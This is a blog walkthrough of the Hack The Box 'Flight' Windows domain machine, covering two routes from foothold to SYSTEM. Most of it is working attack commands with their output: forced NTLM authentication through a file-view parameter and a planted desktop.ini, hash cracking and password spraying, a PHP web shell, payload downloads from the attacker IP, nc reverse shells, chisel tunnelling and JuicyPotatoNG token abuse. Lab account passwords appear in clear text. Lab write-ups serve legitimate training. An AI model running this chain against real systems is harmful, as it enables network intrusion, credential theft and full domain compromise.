Hack the Box (HTB) academy machines walkthrough - flight

Hack the Box (HTB) academy machines walkthrough – flight : Flight from HackTheBox which involved Forced NTLM Authentication, gettingsvc_apache’shash, password spraying on the enumerated usernames will lead us toS.moonwhich had write access toSharedshare allowing us to upload adesktop.iniand again performing forecd authentication to getc.bum’shash, this user had access to web directory through smb allowing us to upload a php file giving us command execution as svc_apache, on enumerating local ports, port 8000 was running and hosting the directory fromC:\inetpub\development, on uploading an aspx file they returned us commands running in context ofiis appol, a service account which hadSeImpersonateprivileged enabled which can be abused through Juicy-Potato to get system shell.

Also read : Hack This Site: Realistic Web Mission – Level 11

NMAP

#$ nmap -p- --min-rate 1000 10.10.11.187
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-13 01:46 EST
Nmap scan report for school.flight.htb (10.10.11.187)
Host is up (0.30s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49697/tcp open  unknown
49709/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 197.92 seconds

Checking the Subdomains and Subfolders:

wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u "http://flight.htb/" -H "Host: FUZZ.flight.htb" --hl 154
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://flight.htb/
Total requests: 19966

=====================================================================
ID           Response   Lines    Word       Chars       Payload              
=====================================================================

000000624:   200        90 L     412 W      3996 Ch     "school"

After get the subdomain isSchool, we continue to enum the URL.

dirsearch -u http://school.flight.htb

  _|. _ _  _  _  _ _|_    v0.4.3.post1
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kayiz/Desktop/HTB/Flights/reports/http_school.flight.htb/_22-12-13_01-56-16.txt

Target: http://school.flight.htb/

But i notice this envidence:

It’s maybe LFI vulnerability in this URL so we check it with../../../../etc/passwdand got the result.

So we will check the sourcecode to make sure how the filter work right

<?php

ini_set('display_errors', 0);
error_reporting(E_ERROR | E_WARNING | E_PARSE); 

if(isset($_GET['view'])){
$file=$_GET['view'];
if ((strpos(urldecode($_GET['view']),'..')!==false)||
    (strpos(urldecode(strtolower($_GET['view'])),'filter')!==false)||
    (strpos(urldecode($_GET['view']),'\\')!==false)||
    (strpos(urldecode($_GET['view']),'htaccess')!==false)||
    (strpos(urldecode($_GET['view']),'.shtml')!==false)
){
    echo "<h1>Suspicious Activity Blocked!";
    echo "<h3>Incident will be reported</h3>\r\n";
}else{
    echo file_get_contents($_GET['view']);
}
}else{
    echo file_get_contents("C:\\xampp\\htdocs\\school.flight.htb\\home.html");
}

?>

Humh it’s maybe so hard to try to bypass this filter for exploiting this vul. => The url validation part prevents us from doing LFI. But we can use this code to force the service to fetch a remote source using Windows network share syntax: //ip>/<share> and attempt to capture the hash of a service.

#Website: 
http://school.flight.htb/index.php?view=//ip-attack/test
#Attacker's machine:
responder -I tun0 -wPv
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.3.0

  To support this project:
  Patreon -> https://www.patreon.com/PythonResponder
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie ([email protected])
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [ON]
    Auth proxy                 [ON]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.16.13]
    Responder IPv6             [dead:beef:4::100b]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']

[+] Current Session Variables:
    Responder Machine Name     [WIN-UJ4VMU7XFG1]
    Responder Domain Name      [R924.LOCAL]
    Responder DCE-RPC Port     [47241]

[+] Listening for events...                                                           

[SMB] NTLMv2-SSP Client   : 10.10.11.187
[SMB] NTLMv2-SSP Username : flight\svc_apache
[SMB] NTLMv2-SSP Hash     : svc_apache::flight:90b54e5073440f91:DACEA051848BC07064B8F1F6CF6ECAFD:0101000000000000003EECF9970ED90152190EB7403C9CC30000000002000800520039003200340001001E00570049004E002D0055004A00340056004D0055003700580046004700310004003400570049004E002D0055004A00340056004D005500370058004600470031002E0052003900320034002E004C004F00430041004C000300140052003900320034002E004C004F00430041004C000500140052003900320034002E004C004F00430041004C0007000800003EECF9970ED90106000400020000000800300030000000000000000000000000300000E07D4392A4BC40C85784D45E08300CFC51A6ED1E43328109EE9B0274E51796EC0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00310033000000000000000000

Crack this hash with hashcat and get the result:

hashcat -a 0 -m 5600 hash /usr/share/wordlists/rockyou.txt --show
SVC_APACHE::flight:8c0eafbdd12e31fd:e3a4c51868aef317982aabb15ce83935:010100000000000080c8475ed80dd901b5e12e7f671312270000000002000800590048003900320001001e00570049004e002d0030005200590058005800350031005800460041004b0004003400570049004e002d0030005200590058005800350031005800460041004b002e0059004800390032002e004c004f00430041004c000300140059004800390032002e004c004f00430041004c000500140059004800390032002e004c004f00430041004c000700080080c8475ed80dd901060004000200000008003000300000000000000000000000003000008e8c740a436ff819b2c69c06aef972668429b6fd779ee4577bff175870156ea60a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e00310033000000000000000000
:S*******13

PORT 139/445 (SMB)

Checking null authentication on SMB shows that we can’t access any share through anonymously

After get the credssvc_apache, we will check the folders in SMB service

smbclient -L //flight.htb/ -U svc_apache
Password for [WORKGROUP\svc_apache]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Shared          Disk      
        SYSVOL          Disk      Logon server share 
        Users           Disk      
        Web             Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to flight.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

AD Enum:

Perform enum on SMB using the previously obtained credential

> ~/tools/cme/cme OR crackmapexec smb flight.htb -u svc_apache -p 'S*********3' --users                            
SMB    flight.htb      445    G0     flight.htb\O.Possum          badpwdcount: 0 desc: Helpdesk
SMB    flight.htb      445    G0     flight.htb\svc_apache        badpwdcount: 0 desc: Service Apache web
SMB    flight.htb      445    G0     flight.htb\V.Stevens         badpwdcount: 0 desc: Secretary
SMB    flight.htb      445    G0     flight.htb\D.Truff           badpwdcount: 0 desc: Project Manager
SMB    flight.htb      445    G0     flight.htb\I.Francis         badpwdcount: 0 desc: Nobody knows why he's here
SMB    flight.htb      445    G0     flight.htb\W.Walker          badpwdcount: 0 desc: Payroll officer
SMB    flight.htb      445    G0     flight.htb\C.Bum             badpwdcount: 1 desc: Senior Web Developer
SMB    flight.htb      445    G0     flight.htb\M.Gold            badpwdcount: 0 desc: Sysadmin
SMB    flight.htb      445    G0     flight.htb\L.Kein            badpwdcount: 0 desc: Penetration tester
SMB    flight.htb      445    G0     flight.htb\G.Lors            badpwdcount: 0 desc: Sales manager
SMB    flight.htb      445    G0     flight.htb\R.Cold            badpwdcount: 0 desc: HR Assistant
SMB    flight.htb      445    G0     flight.htb\S.Moon            badpwdcount: 0 desc: Junio

Using a similar approach, we learnt that another users.moonis using the same password assvc_apache

> ~/tools/cme/cme OR crackmapexec smb flight.htb -u users.txt -p 'S*********3' --continue-on-success
SMB    flight.htb      445    G0     [-] flight.htb\O.Possum:S*********3 STATUS_LOGON_FAILURE 
SMB    flight.htb      445    G0     [+] flight.htb\svc_apache:S*********3 
SMB    flight.htb      445    G0     [-] flight.htb\V.Stevens:S*********3 STATUS_LOGON_FAILURE 
SMB    flight.htb      445    G0     [-] flight.htb\D.Truff:S*********3 STATUS_LOGON_FAILURE 
SMB    flight.htb      445    G0     [-] flight.htb\I.Francis:S*********3 STATUS_LOGON_FAILURE 
SMB    flight.htb      445    G0     [-] flight.htb\W.Walker:S*********3 STATUS_LOGON_FAILURE 
SMB    flight.htb      445    G0     [-] flight.htb\C.Bum:S*********3 STATUS_LOGON_FAILURE 
SMB    flight.htb      445    G0     [-] flight.htb\M.Gold:S*********3 STATUS_LOGON_FAILURE 
SMB    flight.htb      445    G0     [-] flight.htb\L.Kein:S*********3 STATUS_LOGON_FAILURE 
SMB    flight.htb      445    G0     [-] flight.htb\G.Lors:S*********3 STATUS_LOGON_FAILURE 
SMB    flight.htb      445    G0     [-] flight.htb\R.Cold:S*********3 STATUS_LOGON_FAILURE 
SMB    flight.htb      445    G0     [+] flight.htb\S.Moon:S*********3

User: C.bum

Using impacket-smbexec, we can find out which share is writable. But there seems to be customised code that prevents a lot of file types to be written:Shared

impacket-psexec flight.htb/[email protected]   
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

Password:
[*] Requesting shares on g0.flight.htb.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[*] Found writable share Shared
[*] Uploading file uCHgwuyI.exe
[-] Error uploading file uCHgwuyI.exe, aborting.....
[-] Error performing the installation, cleaning up: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)

[.ShellClassInfo]
IconResource=\\<ip>\test
After creating the file desktop.ini, we put it in the smb folder Shared:

smbclient //flight.htb/shared -U S.moon
Password for [WORKGROUP\S.moon]:
Try "help" to get a list of possible commands.
smb: \> put desktop.ini

With Attacker's machine:
responder -I tun0 -wPv
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.3.0

  To support this project:
  Patreon -> https://www.patreon.com/PythonResponder
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie ([email protected])
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [ON]
    Auth proxy                 [ON]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.16.13]
    Responder IPv6             [dead:beef:4::100b]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']

[+] Current Session Variables:
    Responder Machine Name     [WIN-W7Y6MWYR8I8]
    Responder Domain Name      [K8PD.LOCAL]
    Responder DCE-RPC Port     [46715]

[+] Listening for events...                                                           

[SMB] NTLMv2-SSP Client   : 10.10.11.187
[SMB] NTLMv2-SSP Username : flight.htb\c.bum
[SMB] NTLMv2-SSP Hash     : c.bum::flight.htb:c69dd0be9d4ce77f:00496C1DA43547AFEB8ED388C9C0DA2D:010100000000000000C6E5869D0ED901BE5A960CC06FDB0D00000000020008004B0038005000440001001E00570049004E002D0057003700590036004D0057005900520038004900380004003400570049004E002D0057003700590036004D005700590052003800490038002E004B003800500044002E004C004F00430041004C00030014004B003800500044002E004C004F00430041004C00050014004B003800500044002E004C004F00430041004C000700080000C6E5869D0ED90106000400020000000800300030000000000000000000000000300000E07D4392A4BC40C85784D45E08300CFC51A6ED1E43328109EE9B0274E51796EC0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00310033000000000000000000
After that we use hashcat to crack c.bum password:

hashcat -a 0 -m 5600 hash_c.bum /usr/share/wordlists/rockyou.txt --show
C.BUM::flight.htb:63feab9f7229564f:2bc7d47b69023462e28e2df7dccce6e6:010100000000000080375566db0dd9010a4e5110dfd2119000000000020008004e0042004200380001001e00570049004e002d0042005400540039004a0050005a004a0042003700550004003400570049004e002d0042005400540039004a0050005a004a004200370055002e004e004200420038002e004c004f00430041004c00030014004e004200420038002e004c004f00430041004c00050014004e004200420038002e004c004f00430041004c000700080080375566db0dd901060004000200000008003000300000000000000000000000003000008e8c740a436ff819b2c69c06aef972668429b6fd779ee4577bff175870156ea60a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e00310033000000000000000000
:T*************4
After get this cred, we can login into the Web folder with smb service.

smbclient //flight.htb/Web -U c.bum 
Password for [WORKGROUP\c.bum]:
Try "help" to get a list of possible commands.
Then i put the p0wny-shell into the flight.htb: https://github.com/flozz/p0wny-shell

smb: \> ls
  .                                   D        0  Tue Dec 13 09:57:01 2022
  ..                                  D        0  Tue Dec 13 09:57:01 2022
  flight.htb                          D        0  Tue Dec 13 09:57:01 2022
  school.flight.htb                   D        0  Tue Dec 13 09:57:01 2022

                5056511 blocks of size 4096. 1250756 blocks available
smb: \> cd flight.htb
smb: \flight.htb\> put web_shell.php test.php
putting file web_shell.php as \flight.htb\test.php (8.4 kb/s) (average 9.0 kb/s)
smb: \flight.htb\>

Then go to the web_shell and get the connect session with revshells.com

C.bum Session:

We got the cred of c.bum so we need to change the session connect to c.bum withRunasCS:https://github.com/antonioCoco/RunasCs/tree/master

PS C:\Users\svc_apache\Desktop> .\test.exe c.bum Tikkycoll_431012284 powershell -r 10.10.16.13:9003
[*] Warning: Using function CreateProcessWithLogonW is not compatible with logon type 8. Reverting to logon type Interactive (2)...
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-59b6e$\Default
[+] Async process 'powershell' with pid 2380 created and left in background.

After that we can type theuser.txtfile

P.E

After get the shell withsvc_apacheuser, i will check port which is opening to serve the specified service and i got the8000. So i pivot it with chisel to interact to it with attacker’s machine:

PS C:\xampp\htdocs\flight.htb> netstat -a

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:80             g0:0                   LISTENING
  TCP    0.0.0.0:88             g0:0                   LISTENING
  TCP    0.0.0.0:135            g0:0                   LISTENING
  TCP    0.0.0.0:389            g0:0                   LISTENING
  TCP    0.0.0.0:443            g0:0                   LISTENING
  TCP    0.0.0.0:445            g0:0                   LISTENING
  TCP    0.0.0.0:464            g0:0                   LISTENING
  TCP    0.0.0.0:593            g0:0                   LISTENING
  TCP    0.0.0.0:636            g0:0                   LISTENING
  TCP    0.0.0.0:3268           g0:0                   LISTENING
  TCP    0.0.0.0:3269           g0:0                   LISTENING
  TCP    0.0.0.0:5985           g0:0                   LISTENING
  TCP    0.0.0.0:8000           g0:0                   LISTENING

Pivoting Network with Chisel:

#Client:
.\chisel.exe client 10.10.16.13:9999 R:8000:127.0.0.1:8000

#Server:
chisel server --reverse -p 9999

After i got the connect with website, i realize the website is written by ASP .NET => i can try to upload the.aspxshell to reverse this sesssion

Because the shell maybe remove very quick so we need to upload it to somewhere and we just copy it maybe it's necessary.
PS C:\users\svc_apache\Desktop> copy cmd.aspx c:\inetpub\development\

We can get the reverse shell withiis apppool\defaultapppool

Administrator

Enum:

PS C:\windows\system32\inetsrv> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

After refering this posthttps://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens. I decide to choose Potatojuice to Priv this machinehttps://github.com/antonioCoco/JuicyPotatoNG

i will upload 2 things into c:\users\c.bum\desktop
>certutil.exe -urlcache -f http://10.10.16.13/nc.exe nc.exe
>certutil.exe -urlcache -f http://10.10.16.13/JuicyPotatoNG.exe test.exe

After that we grant permission 2 files for everyone
>icacls nc.exe /grant Users:F
>icacls test.exe /grant Users:F

We go to theiis/appoolsession to get the root

c:\users\c.bum\desktop\test.exe -t * -p "c:\users\c.bum\desktop\nc.exe" -a "10.10.16.13 9005 -e cmd.exe"

Result:

2nd Method

PORT 80 (HTTP)

The site didn’t had anything there as it was just a page with no links alsogobusterdidn’t showed anything interesting to as well

So addingflight.htbin/etc/hostsfile as we can see the domain name at the bottom of the page

Fuzzing for subdomains usingwfuzz

wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://flight.htb' -H "Host: FUZZ.flight.htb"  --hh 7069

Adding this subdomain in hosts file and accessing the site

Checking for Local File Inclusion it filters..if it’s in the url but allows/

Foothold (Svc_apache)

Runningwfuzzagain to fuzz for LFI payloads we find that we can just specify a file name without using..

Let’s verify if we have remote file inclusion if we do we can just try accessing a fake share on our machine and useresponderto capture NTLMv2 hash

We have a hit so now running responder and accessing a fake share with//IP/share

responder -I tun0

http://school.flight.htb/index.php?view=//10.10.14.28/uwu

Saving this hash in a file cracking it withjohn

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

With the valid credentials we can start enumerating the shares and usernames throughcrackmapexec

Usingenum4linuxto query usernames and filtering usernames so that we can password spray on them

enum4linux-ng -A flight.htb -u 'svc_apache' -p 'S@Ss!K@*t13' | grep username | awk -F : {'print $2'} > users.txt

S.moon

Using either cme or kerbrute to perform password spary we’ll getS.Moonhaving the same password

kerbrute passwordspray -d flight.htb --dc 10.10.11.187 ./users.txt 'S@Ss!K@*t13'

cme smb flight.htb -u users.txt -p 'S@Ss!K@*t13' --continue-on-success

Checking shares with s.moon, we see that we have write access on `shared`

C.bum

On uploading.scffile extension to perform forced authentication it didn’t allowed us to upload that extension, not sure why

But on uploadingdesktop.inifile it worked

Also read : Hack This Site: Realistic Web Mission – Level 12

[.ShellClassInfo]
IconResource=\\10.10.14.28\aa

Cracking this hash again with john

Foothold

This user has write access onwebshare which means that we can upload php file which will be reflected on schooled.flight.htb

Uploading a php file callingphpinfo()

<?php phpinfo(); ?>

Having the ability to execute commands on the system we can get a reverse shell by uploading nc.exe and executing it

http://school.flight.htb/uwu.php?cmd=curl+10.10.14.28:2222/nc64.exe -o C:\Windows\Temp\nc64.exe

http://school.flight.htb/uwu.php?cmd=C:\Windows\Temp\nc64.exe 10.10.14.28 3333 -e powershell.exe

Since we already have credentials ofc.bumwe can execute commands through that user usingRunasC.exe

.\RunasCs.exe c.bum Tikkycoll_431012284 whoami

Running netstat, we’ll see that there’s port 8000 open locally

Port forwarding port 8000 usingchisel

chisel server --reverse -p 8001

And running the client on the target machine

.\chisel.exe client 10.10.14.28:8001 R:8000:127.0.0.1:8000

Accessing the port on our browser shows that access is denied

But this shows the path where the directory is hosted,

C:\inetpub\Development

In this folder, there are few html files

Runningicaclson the development folder shows thatc.bumhas write access

UsingRunasCswe can switch user as c.bum and transfer aspx shell in that directory

.\RunasCs.exe c.bum Tikkycoll_431012284 'curl 10.10.14.28:2222/aspx_shell.aspx -o C:\inetpub\Development\shell.aspx'

I tried executing nc.exe to get a reverse shell but it wasn’t working for some reason so instead I generated a msfvenom payload

Transfer it and execute it

On checking privileges ofiis appol,SeImpersonatewas enabled

To abuse this, we can useJuicyPotato-ngto get a system shell

.\potatoe.exe -t * -p "C:\Windows\system32\cmd.exe" -a "/c C:\Windows\Temp\nc.exe 10.10.14.28 6666 -e cmd.exe"

2 comments

A new ransomware type of malware called Akira is targeting the enterprise » The Shastra Phoenixbioinfosys says:
May 9, 2023 at 6:05 am
[…] Also read : Flight – hack the box latest ctf walkthrough […]
Hack The Box Academy Walkthrough - Interface » The Shastra Phoenixbioinfosys says:
May 16, 2023 at 8:09 am
[…] Also read : Hack the Box (HTB) academy machines walkthrough – flight […]